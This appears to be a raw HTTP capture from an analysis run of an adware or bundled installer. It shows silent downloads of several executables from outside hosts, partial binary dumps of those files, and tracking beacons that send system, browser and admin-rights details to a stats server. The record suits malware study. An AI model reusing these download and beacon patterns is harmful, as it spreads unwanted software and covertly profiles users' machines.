GET /thumbnails/icon/images/assets/d/d/ddb3b88cf98eb0220c9e6c252e376749.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 606635
Last-Modified: Thu, 13 Jun 2013 17:49:29 GMT
Connection: keep-alive
ETag: "51ba0629-941ab"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......sRGB.........gAMA......a.....pHYs
..........o.d....tEXtSoftware.Paint.NET v3.5.87;.]....IDATx^....%Yr...
.v..5^^......=.F..*]...:...Z..Z..].u.h.........}..TU7.|...$.I.m.'N.8..
}.r........}.~.w......T............k...[..?O).......3....Y..]...z.....
.v....}W........W>....W.sZ..e.....r.......u.z>.svz.....sry.s.8..
o..T...].~.......w..o.|.. ...c]....._....e.......1<.....y.....`.6..
......c.._r1........p......AJo.8.......).....go.E....../.<]z.g...?N
W_..t..?H...I:......?f..t...............$.z...?L...Qz.....8.r.........
.{......n...b....1...iz....[7^M..|-........Mo_z5}p.|z..........;......
s.............J.]?...r:.}.t.........c......>...z....|.~.>..w..'7
]..q.}....X'..q.Oc.A.!..b|..#................|..}ru...|y;}r..W.|e .?..
.~..........e.qe...9'.c|ry }...6.?....?...>.......u....].f~.....7..
O.18~L.|....).G...5|r.{z..r>.p..].M.]^.....\.2.l9.{z-.wn.....:?....
..>...:.N.O-...g.k...o..8...o.\.x.[<.....-..<.>.X.1~..^.:.
w.....ka......]..:....d...e......>..<g..G7y.7......3.Y|.......:]
.]>..p.^1........d..n....o......o..7.1.....d....47..&.....}-=r.....
...~...o6..........H........ p......b9.!..:...d.....t.....W.@  \.._...
.\.^P.w.... u.{A....@_...y.......W.~.. ..uy....{A..........{o ......Qs
.>.O.:<_...............j.,.<..g`.]al....K..A.....,....Vl.1..I
..')}.3...>..x....o.yz.._../.q....NO.........O..._.?]..~z.q..'..S..
.n}....^..x.....O}....^.../.z....c..0.^..n..!..S..7X...^J.>.1..k..[
O.wo..>x.j..[...[......;.X..%}..={.@9.>>.6...r~..?b|..YG.
<<< skipped >>>


GET /analytics.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:57 GMT
Expires: Sun, 19 Apr 2015 01:35:57 GMT
Last-Modified: Wed, 08 Apr 2015 20:30:30 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 11178
Age: 43
Cache-Control: public, max-age=7200
Alternate-Protocol: 80:quic,p=1
...........}{W.....|.....'.$@/....w..m.=.].$BJHR..R.......l.2.9.}...y.
.%..t...H...(...evG....X...v...&.....8.....B..=...}.;oT(E.]e&.e.;2>
..q..W..[......2....Z.2.gIp&su...2.&.,..,.Tfdn....u...N...w.<......
T.o...3.....p@..%.p.$F..........M6..,.....O..D..D.2C.O..l...xH-.T....S
.Z*..sJN&CjfB.gS.u.]PbBM.fJc8A......L....%.$ .._....Jhs,g.....(.<..
..i.f.....<[email protected]*J.0...e=.Fg...9
..b,..../.q...I.c<..v............X..*).......4.H..u.7o.U.....hI...%
../c7TR.i..,...t{"M..t.U....z=r_iou5..Q|<.S.t.~.Kn|.kno.....h..%}3.
ZH..G..<}.....W......}w....O..|...U...~...F...l.../~].n476.........
A.Nd...h......v....A........s....!.<"/..s.LQj.R...3......>.T.j .
.Fm...Z.."...z..2..m..K..4.&..E.D..H(B........vU/[email protected] t..Q....n...
V.}.V.>.......%n,B.\.f3.....{{|L......q.....N....U8.o..||......Z(.7
.?.5t.|<.w..D...5.C....C1St........6.`.7....Hh.Q...L..#;..V...o....
/...........ZA0..bu.`{...cpFch....z.....fNN3.H..t.f.z....B...P.;....)`
.....x.z............Jh:.......O.....Ls32Y.6(L......Z...R.p....g....S..
\.#.&..q<..sq!o......"i...$.pR..@....?..t9.!..#E.......AQ1q.:XhL'{.
...L......|%......R...?.O....|G......2...=/...m....T.....Bgp..N.....zb
I.7.Y)-v.c.......F..y...%....vIj...8.....C-..8....v..JvTToFN. a...0...
 ...b...s.!.j.S.. .k...$.`...C# &.p...I...K.......4.b..5h..;..q.?.w...
}Nc...P.......l.<$...i..p.x..5k.I.Z...X..E.w......6.....q .:.:.)...
..:...C...H.rm3.W.N.KZ..?}.Ew~...(7..U.q.....H.$.Nv!.s.}%.$...2.y...E.
..a...{.6.$3..s.3...`aof.d<5.t,......]=.Q.'.Qs...#X........V.&l
<<< skipped >>>

GET /r/collect?v=1&_v=j35&a=1886521082&t=pageview&_s=1&dl=http://VVV.appshat.com/home&ul=en-us&de=utf-8&dt=Apps Hat&sd=32-bit&sr=1716x901&vp=1018x770&je=0&_u=AEAAAAAAI~&jid=2102561798&cid=1223026756.1429400200&tid=UA-42656881-1&_r=1&z=866469168 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Sat, 18 Apr 2015 23:36:40 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Server: Golfe2
Content-Length: 35
Alternate-Protocol: 80:quic,p=1
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Date: Sat, 18 Apr 2015 23:36:40 GMT..Pragma: no-cache..E
xpires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-sto
re, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-C
ontent-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2.
.Content-Length: 35..Alternate-Protocol: 80:quic,p=1..GIF89a..........
...,...........D..;..



GET /installer.gif?action=started&app=70121&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_32&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&mdat=&procstarttime=1429400147&procruntime=3&rnd=1429400150 HTTP/1.1
Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 9hkVT6KCKBsGuckGW1yh7bJ9NcxAwS8bmx/wMMT eTBlsSw/7pKCy5zCaYOR5lakYD49C6QKZp0=
x-amz-request-id: 6BAA1D67438CC5B1
Date: Sat, 18 Apr 2015 23:35:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9hkVT6
KCKBsGuckGW1yh7bJ9NcxAwS8bmx/wMMT eTBlsSw/7pKCy5zCaYOR5lakYD49C6QKZp0=
..x-amz-request-id: 6BAA1D67438CC5B1..Date: Sat, 18 Apr 2015 23:35:51 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer.gif?action=finished&LFMR=_ffDll_0&app=70121&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_32&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=16&rnd=1429400163 HTTP/1.1


Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: quEr4sHnSxtRUX8xCFfOoNwsjLt82y9z1HbhDCpsqT3oPuOmuBBHJtv19el umk01ngWlSuEtE8=
x-amz-request-id: 94D37560D32A63FE
Date: Sat, 18 Apr 2015 23:36:04 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=70121&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400147&lifetime=0&silent=1&crtnm=na&procstarttime=1429400147&procruntime=16&rnd=1429400163 HTTP/1.1


Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 1VzCC4TLvItOp1zrMZKjzwsX/1WnonpygwlqyCt9T7FfV6fiUNbso1ItRu6yviqblt6raIYBzDo=
x-amz-request-id: 814FF285EB74819C
Date: Sat, 18 Apr 2015 23:36:04 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:45 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 1VzCC4
TLvItOp1zrMZKjzwsX/1WnonpygwlqyCt9T7FfV6fiUNbso1ItRu6yviqblt6raIYBzDo=
..x-amz-request-id: 814FF285EB74819C..Date: Sat, 18 Apr 2015 23:36:04 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:45 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..



GET /msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?0eef9989179d6dc8 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 867
Date: Sat, 18 Apr 2015 23:38:23 GMT
Connection: keep-alive
0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root 
CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..29
0318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.
0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(..
.v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..
h..'.8...>..&Y.s....&.....[...`.I.(.i;...(....aW7.t..t.:.r/.......=
...3.. .S.:.s..A. :......O..2`.W....hh.8&`u..w..... [email protected].^....w.
d.z._....b..l.Ti....n...qv.i.........B0@0...U...........0...U.......0.
...0...U........K...E$.MP.c.......0...*[email protected].
...A.....(.3.k.t...-..........sgJ..D{x..nlo.).39E....Wl.....S.-.$l..c.
.ShgV>...5!..h....S......]F...zX(./....7A..Dm.S(.~.g.........L'.L.s
sv.....z..-....,.<.U...~6..WI...-|`..AQ.#...2k.....,3.:;%..@.;,.x.a
/....Uo.....M.(.r..bPe.....1....GX?_HTTP/1.1 200 OK..Content-Type: app
lication/x-x509-ca-cert..Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT.
.Accept-Ranges: bytes..ETag: "05934e1494dd01:0"..Server: Microsoft-IIS
/7.5..X-Powered-By: ASP.NET..Content-Length: 867..Date: Sat, 18 Apr 20
15 23:38:23 GMT..Connection: keep-alive..0.._0..G.............!XS..0..
.*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1
.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....Globa
lSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.
H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R..
.Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:35:15 GMT
Content-Type: application/octet-stream
Content-Length: 671328
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:15 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........*...D...D.
[email protected][email protected][email protected][email protected]...
[email protected]............
[email protected]......."....
@.......................................... ..............."..`.......
[email protected]................
...............text....P.......R.................. ..`.rdata...^...p..
.`...V..............@[email protected]...$O.......,[email protected].
....... ......................@[email protected]..................
@..B..................................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.NG.d.....P....T.H.3
.P.E.d......M..E....Q...e.P......M.......E.....j.j..M..K...j.j..M.Q.M.
.K....E......E..M.d......Y..]...U..Q.M..E.P.pn.....P.M..4.....].......
..........U..Q.M.j.j..E.P.M.Q.U.R.M..a.....]..............U..Q.M..M...
....E...]...........U..Q.M..M......P.E.P.M..d...P.M........]........U.
.....M..E..H.;M.r..M......;E.s..M.......U..B. E.;E.s..M..Q. U..U..M...
... E..E..E.;E.s..M..M.... U..E..H. M.;.w..M.......U..B. E. E..E..M..Q
..U. U..U..E..H.;M.s.j..U.R.M..?....E.;E.tS.M.Q.M.......E..E.P.M..
<<< skipped >>>


GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Tue, 14 Apr 2015 05:02:07 GMT
Accept-Ranges: bytes
ETag: "2711f7277076d01:0"
Server: Microsoft-IIS/8.5
VTag: 438486457400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Sat, 18 Apr 2015 23:38:37 GMT
Connection: keep-alive
0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Si
gning PCA..150413163223Z..150713045223Z.a0_0...U.#..0..........X..7.3.
..L...0... .....7.........0...U......Z0... .....7......150712164223Z0.
..*.H.............WK....e.\.-.n......./......."]..E!.. //=...[....w...
 ..........#...[.l.J..f|..... .s......w...J._.......3.[..#.z....ko.I..
Q{....e.nV......F..d}..rF\H.jlH]dQ.E....x......W............j....&L. 2
.$.?...X?.#.(.....pK.v.......y..r....t......=.AW......K.G.gJD.b.HTTP/1
.1 200 OK..Content-Type: application/pkix-crl..Last-Modified: Tue, 14 
Apr 2015 05:02:07 GMT..Accept-Ranges: bytes..ETag: "2711f7277076d01:0"
..Server: Microsoft-IIS/8.5..VTag: 438486457400000000..P3P: CP="ALL IN
D DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT CO
M INT NAV ONL PHY PRE PUR UNI"..X-Powered-By: ASP.NET..Content-Length:
 554..Cache-Control: max-age=900..Date: Sat, 18 Apr 2015 23:38:37 GMT.
.Connection: keep-alive..0..&0......0...*.H........0y1.0...U....US1.0.
..U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1#0
!..U....Microsoft Code Signing PCA..150413163223Z..150713045223Z.a0_0.
..U.#..0..........X..7.3...L...0... .....7.........0...U......Z0... ..
...7......150712164223Z0...*.H.............WK....e.\.-.n......./......
."]..E!.. //=...[....w... ..........#...[.l.J..f|..... .s......w...J._
.......3.[..#.z....ko.I..Q{....e.nV......F..d}..rF\H.jlH]dQ.E....x....
..W............j....&L. 2.$.?...X?.#.(.....pK.v.......y..r....t...
<<< skipped >>>


GET /installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_43&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&mdat=&procstarttime=1429400187&procruntime=2&rnd=1429400189 HTTP/1.1
Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache



GIF89a.............,...........D..;



GET /16669.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 2F3CXDdsfBwAhTD7v1xeC59AEINFij/sY4G r 3F6T7U58bcAumiKsE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=503496-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 167832
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 503496-671327/671328
PARAMETER...TEARDOWN....PAUSE...PLAY....SETUP...ANNOUNCE....Refusing t
o issue an RTSP request [%s] without a session ID.....DESCRIBE....OPTI
ONS.Got invalid RTSP request: RTSPREQ_NONE..Failed writing RTP data.Ca
nnot pause RTP....Cannot write a 0 size RTP packet....Got RTSP Session
 ID Line [%s], but wanted ID [%s]...Got a blank Session ID..Unable to 
read the CSeq header: [%s]....: %ld...Got an error writing an RTP pack
[email protected].._E..0E. `E. `E.........@0E.......
......D...t.G.N............HE..$E.."E.p.G...F...F...F.................
....................................EHLO %s.HELO %s.STARTTLS....AUTH %
s.AUTH %s %s..No known authentication mechanisms supported!...HELP....
%s %s...VRFY....MAIL FROM:%s SIZE=%s....MAIL FROM:%s AUTH=%s SIZE=%s..
..MAIL FROM:%s AUTH=%s....MAIL FROM:%s....%I64d...<%s>....<&g
t;..RCPT TO:<%s>....RCPT TO:%s..QUIT....Got unexpected smtp-serv
er response: %d.STARTTLS denied. %c.STARTTLS not supported..Remote acc
ess denied: %d....Authentication cancelled....Command failed: %d..MAIL
 failed: %d.DATA....RCPT failed: %d.DATA failed: %d.........SMTPS not 
supported!....AUTH=...localhost...........Failed to alloc scratch buff
er!.SMB.....`.G.0FE..... [email protected].......
..............NT LM 0.12..curl....i386-pc-win32...?????...\\..pop.POP3
..........G..PE..VE..NE.....0VE.._E. PE. `E. `E..........OE.....n....@
..D.....G. ... ........HE..$E. \E...G...F...F...F.....................
....................n...........CAPA....STLS....USER %s.APOP %s %s
<<< skipped >>>


GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=160792-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1125450
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:11 GMT
Content-Range: bytes 160792-1286241/1286329
X-Cache: Miss from cloudfront
Via: 1.1 f05da132bcca9514452d39f83b3544d2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UWMPqz7voCuTk44WXQVCTh7JqanIA1LQadP7LxtEA74upfxQszcbGA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 1125450..Connection: keep-alive..Cache-Control: no-cac
he..Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT..Accept-Ranges: bytes
..ETag: "b8e31d44765d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 18 Apr 2015 23:35:11 GMT..Content-Range: bytes 1607
92-1286241/1286329..X-Cache: Miss from cloudfront..Via: 1.1 f05da132bc
ca9514452d39f83b3544d2.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UWMPq
z7voCuTk44WXQVCTh7JqanIA1LQadP7LxtEA74upfxQszcbGA==........'oS.l.g....
..*. .=.....8..;....#.?U... .i....=..{}[email protected]
}..j..bP.&.k.Z%...0..T...SG.9....w.........U..d[3XR. .1.......... I...
T.H'..F,4........j..y.7F..~eF^Lt...........a...q.,.|...M3.]....)......
.FT.^..k.Ad...0MVn;.R....7W;~..,[email protected].~.
%.6.I....F..<.(.O..^<..r.vOh..J...:.....,.sY...C!2.;O........N:.
.2. ..F.Q...?g_..n..S..9r l.{...P..fLJ.)......ED..Y...e..w.......J....
}....... B..y.....}..5.ib.-....6.......&....i....u...d.aV.Z....a....Q.
.h.z  N{....Y!N...n.....W...5.f.Z.j. ..O..h.M=k....,..O....S .k..j1V..
.K.E..OYB.].40...A.._u...<...y....}j..].B....7e.D...:2........`?I..
..>.4y.N.#&[:.I..(D.W...r..abD.a..N.....t...0P4q.>....hV.....;..
Ud.OZ..I.....(...p.E.."..{...'..^.X2..U..w.._...(.(..............z.&.g
...E...9.&z.F(...J...EH.......%!...o-aG...:.3.7.....V.....|.q....<.
..........&w.......}..G&.w........x...%4?...4.......sa...vo.G$.Hm...]C
..T.F..Kc"j...../.(;...p".v..........[.D..0:#.|..q.c.a?..r....$;^|
<<< skipped >>>


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2+iPob4twryIF+FfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa/LgCEBBwnU/1VAjXMGAB2OqRdbs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.usertrust.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:22 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 17 Apr 2015 16:29:13 GMT
Expires: Tue, 21 Apr 2015 16:29:13 GMT
ETag: 6C40D625CC1401FE036472E2A3964DEE397BACF5
Cache-Control: max-age=232850,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp5
Content-Length: 471
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...... .F....e*F.yG.b.......2015041
7162913Z0s0q0I0... ........m..Lco.>..... _.~..... .F....e*F.yG.b...
.....p.O.T..0`....u.....20150417162913Z....20150421162913Z0...*.H.....
........P.*b.P3...'>6I.&..,..j...%...$4..Um......J.5.....'.&......)
....*...W...Hpt.>..jMeT.B...1.6....I.........._V6.........=.......f
7Q-R..k.*....T'.N....5j.)....6.-..a...0.......c`......s.a.....$.{...".
....5V..|d.e.d.x.l..l.d....6..a.4.v......W...p78|"....e@..>...



GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 285558
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 0-285557/285558
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 2636148dc4ff819fda62f785a179ffd2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lV0VYKenl5mHv_knq7nJ-RKGTzK40bnXLZKKC1lrqgMe0ch4X6lBcg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......@...............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
[email protected]..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
